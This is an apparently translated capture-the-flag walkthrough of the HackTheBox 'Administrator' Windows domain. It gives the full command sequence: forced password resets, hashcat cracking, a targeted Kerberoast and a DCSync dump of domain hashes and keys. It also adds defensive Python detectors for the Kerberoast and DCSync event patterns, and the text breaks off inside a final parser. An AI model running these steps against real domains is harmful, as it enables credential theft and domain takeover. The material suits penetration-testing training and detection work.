As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

Initial port and service scan with Fscan:

```
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-03-22 13:46:45] [INFO] 暴力破解线程数: 1
[2025-03-22 13:46:45] [INFO] 开始信息扫描
[2025-03-22 13:46:45] [INFO] 最终有效主机数量: 1
[2025-03-22 13:46:45] [INFO] 开始主机扫描
[2025-03-22 13:46:45] [INFO] 有效端口数量: 233
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:110
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:21
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:88
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:389
[2025-03-22 13:46:45] [SUCCESS] 端口开放 administrator.htb:139
[2025-03-22 13:46:46] [SUCCESS] 端口开放 administrator.htb:135
[2025-03-22 13:46:46] [SUCCESS] 端口开放 administrator.htb:445
[2025-03-22 13:46:46] [SUCCESS] 服务识别 administrator.htb:21 => [ftp] 产品:Microsoft ftpd 系统:Windows Banner:[220 Microsoft FTP Service.]
[2025-03-22 13:46:48] [SUCCESS] 服务识别 administrator.htb:110 =>
[2025-03-22 13:46:51] [SUCCESS] 服务识别 administrator.htb:139 => Banner:[.]
[2025-03-22 13:46:53] [SUCCESS] 服务识别 administrator.htb:445 =>
[2025-03-22 13:46:54] [SUCCESS] 服务识别 administrator.htb:88 =>
[2025-03-22 13:46:57] [SUCCESS] 服务识别 administrator.htb:389 =>
[2025-03-22 13:47:51] [SUCCESS] 服务识别 administrator.htb:135 =>
[2025-03-22 13:47:51] [INFO] 存活端口数量: 7
[2025-03-22 13:47:51] [INFO] 开始漏洞扫描
[2025-03-22 13:47:51] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, pop3, smb, smb2, smbghost, webpoc, webtitle
[2025-03-22 13:47:52] [SUCCESS] NetInfo 扫描结果
目标主机: administrator.htb
主机名: dc
发现的网络接口:
IPv4地址:
└─ 10.10.11.42
[2025-03-22 14:09:48] [SUCCESS] 扫描已完成: 11/11
```

RID enumeration

```
┌──(root㉿kali)-[~]
└─# crackmapexec smb administrator.htb -u "Olivia" -p "ichliebedich" --rid-brute | grep SidTypeUser
SMB administrator.htb 445 DC 500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB administrator.htb 445 DC 501: ADMINISTRATOR\Guest (SidTypeUser)
SMB administrator.htb 445 DC 502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB administrator.htb 445 DC 1000: ADMINISTRATOR\DC$ (SidTypeUser)
SMB administrator.htb 445 DC 1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB administrator.htb 445 DC 1109: ADMINISTRATOR\michael (SidTypeUser)
SMB administrator.htb 445 DC 1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB administrator.htb 445 DC 1112: ADMINISTRATOR\emily (SidTypeUser)
SMB administrator.htb 445 DC 1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB administrator.htb 445 DC 3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB administrator.htb 445 DC 3602: ADMINISTRATOR\emma (SidTypeUser)
```

Domain information gathering

```
┌──(root㉿kali)-[~]
└─# bloodhound-python -u Olivia -p 'ichliebedich' -c All -d administrator.htb -ns 10.10.11.42
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: unpack requires a buffer of 4 bytes
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 26S
```

Add dc.administrator.htb to the hosts file first, since the collector connects to the DC by its FQDN.

On Windows, SharpHound can be used together with BloodHound for collection and visualisation:

```
.\SharpHound.exe --collectionmethods All --domain administrator.htb --ldapusername Olivia --ldappassword ichliebedich
```


Analysing the graph reveals a path.


Changing passwords

```
┌──(root㉿kali)-[/tmp]
└─# bloodyAD -u "olivia" -p "ichliebedich" -d "Administrator.htb" --host "10.10.11.42" set password "Michael" "12345678"
[+] Password changed successfully!

┌──(root㉿kali)-[/tmp]
└─# bloodyAD -u "Michael" -p "12345678" -d "Administrator.htb" --host "10.10.11.42" set password "Benjamin" "12345678"
[+] Password changed successfully!
```

Benjamin is a member of the Share Moderator group, so an FTP login with his account is worth trying.


Logging in over FTP reveals a single file, Backup.psafe3.


A .psafe3 file is an encrypted Password Safe database; its master password can be cracked with hashcat (mode 5200, Password Safe v3):

```
E:\小工具\HashcatGUI_cn_v1.3.1(密码爆破)\hashcat-6.2.6>hashcat -m 5200 C:\Users\31702\Desktop\Backup.psafe3 rockyou.txt
hashcat (v6.2.6) starting

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.4)
====================
* Device #1: NVIDIA GeForce RTX 4070 Laptop GPU, 7056/8187 MB, 36MCU

OpenCL API (OpenCL 3.0 CUDA 12.4.89) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce RTX 4070 Laptop GPU, skipped

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) RaptorLake-S Mobile Graphics Controller, 12992/26061 MB (2047 MB allocatable), 32MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2947 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14342307
* Bytes.....: 139917362
* Keyspace..: 14342307

C:\Users\31702\Desktop\Backup.psafe3:tekieromucho

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: C:\Users\31702\Desktop\Backup.psafe3
Time.Started.....: Sat Mar 22 15:15:00 2025 (0 secs)
Time.Estimated...: Sat Mar 22 15:15:00 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2129.0 kH/s (7.31ms) @ Accel:16 Loops:256 Thr:256 Vec:1
Speed.#3.........: 37101 H/s (13.31ms) @ Accel:128 Loops:8 Thr:64 Vec:1
Speed.#*.........: 2166.1 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 147456/14342307 (1.03%)
Rejected.........: 0/147456 (0.00%)
Restore.Point....: 0/14342307 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:16-24
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> mckinley1
Candidates.#3....: mckenzy -> kevin1987
Hardware.Mon.#1..: Temp: 47c Util: 33% Core:2490MHz Mem:8100MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Mar 22 15:14:48 2025
Stopped: Sat Mar 22 15:15:02 2025
```

The recovered master password:

tekieromucho

Opening the database in Password Safe reveals three stored credentials:

```
alexander
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

emily
UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emma
WwANQWnmJnGV07WQN8bMS7FMAbjNur
```

Logging in as emily yields user.txt:

```
┌──(root㉿kali)-[/tmp]
└─# evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> dir
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir


Directory: C:\Users\emily\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar--- 3/21/2025 7:43 PM 34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\emily\Desktop>
```


Going back to the collected data: emily has GenericWrite over the user ethan.

GenericWrite lets an attacker modify the target account's attributes.

When handling authentication, the Kerberos protocol lets any domain user request a service ticket for an account that has an SPN (Service Principal Name, the unique name identifying a service instance).

Such tickets are typically encrypted with the account's NTLM hash (the RC4, etype 23, case seen below), so as soon as a domain account has an SPN registered, an attacker can request the service ticket over Kerberos (for example with PowerView or GetUserSPNs.py), extract it, and crack it offline to recover the account's password indirectly.

Source: 域渗透提权:HTB–Administrator_htb administrator (CSDN blog) and DCSync – BloodHound.

Here ethan has no SPN, but emily's GenericWrite lets us add one, request a ticket for it, and crack that ticket. targetedKerberoast.py automates the SPN write and the ticket request and prints the hash; the cracking itself is done with hashcat.
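Seen from the domain controller, the same step leaves two traces: the SPN write is Security Event ID 5136 (directory object modified, attribute servicePrincipalName, operation Value Added) attributed to emily, and the ticket request is Event ID 4769 for service account ethan with TicketEncryptionType 0x17 (RC4). The detector below is an added example, not code from this write-up or from targetedKerberoast.py; the event records are constructed to mirror the emily to ethan step (the 10.10.14.5 source address is made up), and the field names follow the Windows Security log schema.

```python
"""Detect a targeted Kerberoast from Windows Security events: an SPN added to a
user object (Event ID 5136) followed by an RC4 service-ticket request for that
account (Event ID 4769, etype 0x17).

Added example; not part of the write-up or of targetedKerberoast.py. The events
are constructed to mirror the emily -> ethan step; field names follow the
Security log schema.
"""
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"     # 5136 OperationType: Value Added
VALUE_DELETED = "%%14675"   # 5136 OperationType: Value Deleted
RC4_HMAC = "0x17"           # 4769 TicketEncryptionType for etype 23
ETHAN_DN = "CN=ethan,CN=Users,DC=administrator,DC=htb"

# Constructed sample events (not real logs from the box; 10.10.14.5 is made up).
EVENTS = [
    {"EventID": 5136, "TimeCreated": "2025-03-22T15:48:01", "SubjectUserName": "emily",
     "ObjectClass": "user", "ObjectDN": ETHAN_DN,
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "administrator.htb/ethan", "OperationType": VALUE_ADDED},
    {"EventID": 4769, "TimeCreated": "2025-03-22T15:48:02",
     "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 5136, "TimeCreated": "2025-03-22T15:48:03", "SubjectUserName": "emily",
     "ObjectClass": "user", "ObjectDN": ETHAN_DN,
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "administrator.htb/ethan", "OperationType": VALUE_DELETED},
    # Benign noise: an AES256 ticket for the DC's machine account.
    {"EventID": 4769, "TimeCreated": "2025-03-22T15:49:00",
     "TargetUserName": "olivia@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.42"},
]


def account_from_dn(dn):
    """'CN=ethan,CN=Users,...' -> 'ethan'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def spn_changes(events, op):
    """5136 events that add (or delete) a servicePrincipalName on a user object."""
    return [e for e in events
            if e.get("EventID") == 5136 and e.get("ObjectClass") == "user"
            and e.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
            and e.get("OperationType") == op]


def rc4_user_tgs(events):
    """4769 events: RC4 service ticket for a non-machine, non-krbtgt account.
    Each one is a roastable ticket regardless of who set the SPN."""
    out = []
    for e in events:
        svc = e.get("ServiceName", "")
        if (e.get("EventID") == 4769 and not svc.endswith("$")
                and svc.lower() != "krbtgt"
                and e.get("TicketEncryptionType", "").lower() == RC4_HMAC):
            out.append(e)
    return out


def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Correlate an SPN write on a user with an RC4 TGS request for the same
    account within `window`; also note whether the SPN was removed again
    (targetedKerberoast.py restores the attribute once it has the hash)."""
    hits = []
    for w in spn_changes(events, VALUE_ADDED):
        target = account_from_dn(w["ObjectDN"])
        t0 = datetime.fromisoformat(w["TimeCreated"])
        for t in rc4_user_tgs(events):
            if t["ServiceName"].lower() != target:
                continue
            delta = datetime.fromisoformat(t["TimeCreated"]) - t0
            if not timedelta(0) <= delta <= window:
                continue
            removed = any(account_from_dn(d["ObjectDN"]) == target
                          and datetime.fromisoformat(d["TimeCreated"]) >= t0
                          for d in spn_changes(events, VALUE_DELETED))
            hits.append({"writer": w["SubjectUserName"], "target": target,
                         "requester": t["TargetUserName"], "source_ip": t["IpAddress"],
                         "seconds_after_write": int(delta.total_seconds()),
                         "spn_removed_again": removed})
    return hits


if __name__ == "__main__":
    for h in detect_targeted_kerberoast(EVENTS):
        print(h)
```

Event 5136 is only written when "Audit Directory Service Changes" is enabled and the user objects carry a SACL for Write Property; 4769 needs "Audit Kerberos Service Ticket Operations". A lone RC4 ticket for a user account is already worth a look; the add, request, delete triple inside a few seconds is the targeted pattern.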

Sync the clock with the DC first; otherwise the time difference makes the attempt fail.

```
┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# ntpdig 10.10.11.42
2025-03-22 10:29:27.753630 (-0400) +24090.621426 +/- 0.042936 10.10.11.42 s1 no-leap

┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# ntpdate -u 10.10.11.42
2025-03-22 10:29:31.940331 (-0400) +24090.621867 +/- 0.041282 10.10.11.42 s1 no-leap
CLOCK: time stepped by 24090.621867

┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# python targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$81cb93590ef11dd5470abfccd699f4e7$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
```

The output is a krb5tgs hash (hashcat mode 13100). Crack it with hashcat:

```
E:\小工具\HashcatGUI_cn_v1.3.1(密码爆破)\hashcat-6.2.6>hashcat.exe hash.txt rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.4)
====================
* Device #1: NVIDIA GeForce RTX 4070 Laptop GPU, 7056/8187 MB, 36MCU

OpenCL API (OpenCL 3.0 CUDA 12.4.89) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce RTX 4070 Laptop GPU, skipped

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) RaptorLake-S Mobile Graphics Controller, 12992/26061 MB (2047 MB allocatable), 32MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 386 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14342307
* Bytes.....: 139917362
* Keyspace..: 14342307

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$81cb93590ef11dd5470abfccd699f4e7$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:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....66356a
Time.Started.....: Sat Mar 22 15:50:11 2025 (0 secs)
Time.Estimated...: Sat Mar 22 15:50:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Speed.#3.........: 643.0 kH/s (11.34ms) @ Accel:32 Loops:1 Thr:8 Vec:1
Speed.#*.........: 643.0 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8192/14342307 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/14342307 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: [Copying]
Candidates.#3....: 123456 -> whitey
Hardware.Mon.#1..: Temp: 45c Util: 1% Core:2175MHz Mem:8100MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Mar 22 15:49:52 2025
Stopped: Sat Mar 22 15:50:12 2025
```

The recovered password is limpbizkit.

Next, with ethan's password in hand, check his permissions in BloodHound: ethan's FDOC rights indirectly grant him DCSync rights on the Domain Controller (DC).

DCSync is an attack technique that abuses the Active Directory (AD) replication mechanism. A user holding DCSync rights can impersonate a domain controller and ask another DC to replicate sensitive data such as NTLM hashes and Kerberos keys.

Source: 域渗透提权:HTB–Administrator_htb administrator (CSDN blog).
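On the DC side, each replication request of this kind is logged as Security Event ID 4662 on the domain object, with the replication control-access GUIDs (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) in the Properties field and an AccessMask of 0x100 (Control Access). Only domain controllers, and in some environments a directory-sync service account, should ever produce that combination. The detector below is an added example, not code from this write-up or from impacket; the 4662 records are constructed to resemble the ethan step, and the `dc_accounts` and `allowlist` sets are assumptions you would fill in for your own domain.

```python
"""Flag DCSync attempts in Windows Security Event ID 4662 records.

Added example; not part of the write-up or of impacket. The events are
constructed to resemble what the DC would log for the ethan step; field names
follow the Security log schema.
"""
import re

# Control-access rights whose GUIDs appear in 4662 Properties during replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

DOMAIN_OBJECT = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # domainDNS class GUID
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")

# Constructed sample events (not real logs from the box).
EVENTS = [
    # ethan, an ordinary user, exercises replication rights on the domain object.
    {"EventID": 4662, "SubjectUserName": "ethan", "ObjectType": DOMAIN_OBJECT,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # The DC's own machine account replicating: expected.
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectType": DOMAIN_OBJECT,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # An ordinary property read on a user object: no replication right involved.
    {"EventID": 4662, "SubjectUserName": "olivia",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "AccessMask": "0x20", "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(event):
    """Names of the replication rights listed in a 4662 Properties field."""
    names = set()
    for guid in GUID_RE.findall(event.get("Properties", "")):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            names.add(name)
    return names


def has_control_access(event):
    """True when the AccessMask includes Control Access (0x100)."""
    try:
        return bool(int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS)
    except ValueError:
        return False


def detect_dcsync(events, dc_accounts=frozenset({"DC$"}), allowlist=frozenset()):
    """One finding per 4662 in which a non-DC, non-allowlisted principal uses
    Control Access together with a replication right (the DCSync pattern)."""
    findings = []
    for e in events:
        if e.get("EventID") != 4662 or not has_control_access(e):
            continue
        rights = replication_rights(e)
        if not rights:
            continue
        who = e.get("SubjectUserName", "")
        if who in dc_accounts or who in allowlist:
            continue
        findings.append({"subject": who, "rights": sorted(rights),
                         "object_type": e.get("ObjectType", "")})
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(EVENTS):
        print(f)
```

Event 4662 is only generated when "Audit Directory Service Access" is enabled and the domain object's SACL audits Control Access; with that in place, a finding for any account that is not a DC is worth treating as a DCSync until proven otherwise. The source address is not in 4662, so pair it with the matching 4624 logon for the same account if you need it.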

With DCSync rights, impacket-secretsdump dumps every credential held by the domain controller:

```
┌──(root㉿kali)-[~/yiyi/targetedKerberoast]
└─# impacket-secretsdump ethan:limpbizkit@administrator.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:519b4c84ffe7a54ef275463aaee05feff17f7ab0a3626777009ca9b071077f7b
administrator.htb\michael:aes128-cts-hmac-sha1-96:cf18258aebf243ab8eab4a6d6caec794
administrator.htb\michael:des-cbc-md5:194f1623cdf11957
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:e110f75337181474608f51a5b22d8198d3fa56d68633b384b7136d4496c89337
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:aa2b24ac2fb879262faa4f6ca294f332
administrator.htb\benjamin:des-cbc-md5:1a4f0bce2343cebf
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
```
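A dump like this is also an audit artefact worth reading before moving on: two accounts with the same NT hash share the same password (here michael and benjamin, both reset to 12345678 earlier), the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password (Guest, which is disabled by default), and aad3b435b51404eeaad3b435b51404ee in the LM column means no LM hash is stored. The parser below is an added example, not part of impacket or of this write-up; its sample input is the NTDS hash section copied from the dump above, and the helper names are my own.

```python
"""Audit an impacket-secretsdump NTDS dump for shared, empty and LM-stored hashes.

Added example; not part of impacket or of the write-up. SAMPLE_DUMP is the
domain\\uid:rid:lmhash:nthash section of the dump shown in the write-up.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM storage off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
"""


def parse_secretsdump(text):
    """Parse 'domain\\user:rid:lmhash:nthash:::' lines; every other line
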